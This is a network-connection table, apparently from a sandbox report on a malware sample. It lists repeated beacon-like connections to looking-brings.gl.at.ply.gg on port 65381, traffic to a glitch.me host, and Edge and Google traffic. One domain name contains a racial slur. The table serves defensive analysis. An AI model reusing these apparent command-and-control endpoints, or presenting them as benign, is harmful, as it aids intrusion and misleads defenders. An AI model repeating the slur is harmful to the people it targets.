| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 8.8.8.8:53 | edge-http.microsoft.com | udp |
| US | 13.107.6.158:80 | edge-http.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 95.100.153.147:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 13.107.21.239:443 | edge.microsoft.com | tcp |
| US | 204.79.197.239:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 95.100.153.167:443 | www.bing.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 204.79.197.239:443 | edge.microsoft.com | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 95.100.153.192:443 | www.bing.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.130.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
